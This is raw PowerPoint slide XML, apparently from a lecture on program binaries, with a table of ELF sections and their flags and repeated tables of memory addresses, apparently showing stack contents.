                        <a:t>PROGBITS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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>ALLOC and WRITE</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36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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>.rodata</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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>read-only data</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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>PROGBITS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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>ALLOC</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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>.bss</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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>uninitialized data</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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>NOBITS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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>ALLOC</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655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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>.init and .fini</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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>pre and post code</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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>PROGBITS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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>ALLOC and EXECINSTR</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5107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84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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>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2"/>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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048423</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>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7"/>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8"/>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9"/>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0"/>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1"/>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2"/>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3"/>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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a: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5"/>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170</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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xfd290</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x8048404</a:t>
                      </a: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223707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0xfd2ac</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="213241008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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>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2"/>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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048423</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>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7"/>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8"/>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9"/>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0"/>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1"/>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2"/>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3"/>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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a: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5"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</a:t>
                      </a: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171</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0xfd2ac</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xfd290</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x8048404</a:t>
                      </a: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223707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0xfd2ac</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6169700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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>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2"/>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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048423</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>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7"/>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8"/>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9"/>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0"/>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1"/>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2"/>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3"/>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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a: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5"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</a:t>
                      </a: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172</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0xfd2ac</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xfd290</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x8048407</a:t>
                      </a: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24872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0xfd2ac</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="185444518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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>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2"/>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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048423</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>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7"/>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8"/>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9"/>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0"/>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1"/>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2"/>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3"/>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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a: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5"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</a:t>
                      </a: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173</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0xfd2ac</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xfd290</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x804840c</a:t>
                      </a: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277190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0xfd2ac</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="122998815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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>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2"/>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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048423</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>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7"/>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8"/>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9"/>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0"/>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1"/>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2"/>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3"/>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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10015"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</a:t>
                      </a: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174</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0xfd2ac</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xfd290</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x804840c</a:t>
                      </a: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277190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0xfd2ac</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4280422" y="-24436"/>
            <a:ext cx="5467428" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048504: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>asu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
